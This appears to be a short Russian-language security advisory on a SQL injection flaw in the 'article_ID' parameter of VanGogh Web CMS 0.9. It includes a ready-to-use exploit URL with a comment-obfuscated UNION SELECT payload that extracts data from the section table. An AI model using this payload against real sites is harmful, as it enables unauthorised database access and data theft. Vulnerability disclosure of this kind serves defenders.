Программа: VanGogh Web CMS 0.9

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре «article_ID» сценарием index.php. Удаленный
пользователь может с помощью специально сформированного запроса выполнить
произвольные SQL команды в базе данных приложения.

Эксплоит:

http://[Target]/[vangogh_path]/index.php?article_ID= [SQL Injection]&get_action=article&section=5

http://[Target]/[vangogh_path]/index.php?article_ID=8/**/AND/**/1=2/* */UNION/**/SELECT/**/1,concat(id,0x3a,title),3/**/FROM/*
*/section&get_action=article&section=5

Подписаться
Уведомить о
0 комментариев
Межтекстовые Отзывы
Посмотреть все комментарии